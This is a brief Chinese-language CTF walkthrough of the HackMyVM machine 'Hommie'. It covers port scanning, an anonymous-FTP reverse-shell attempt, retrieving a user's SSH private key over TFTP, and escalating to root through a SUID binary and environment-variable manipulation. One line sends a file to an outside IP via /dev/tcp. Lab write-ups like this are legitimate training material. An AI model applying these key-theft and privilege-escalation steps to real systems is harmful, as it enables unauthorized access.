HMV-Hommie靶场复盘

Hommie

端口扫描/信息收集

发现有三个端口 ftp ssh http
先看看ftp能不能匿名登录

尝试把反弹shell文件上传无法得到shell
80端口

得到两个用户 alexia nobody 并且提示我们要得到alexia的id_rsa
目录扫描

使用了两个常用的目录字典都没有扫描到说明大概率就是没有其他目录
web如果没有信息就说明信息收集还不过 – 重新用nmap扫描看看有没有其他服务

有新的发现还有开放dhcpc tftp 服务
根据前面的提示 get id_rsa 成功得到rsa私钥登录到ssh

成功拿到shell

提权

没有sudo指令查suid 不一样的就是的第一个/opt/showMetheKey
执行这个文件之后发现是一个rsa私钥

这个私钥是当前用户的我们要想办法得到root用户的
现在将这个文件下载到本地 cat showMetheKey > /dev/tcp/192.168.240.83/1234

用ida分析这个程序

所以修改环境变量这样子就可以得到root的rsa私钥

成功登录到root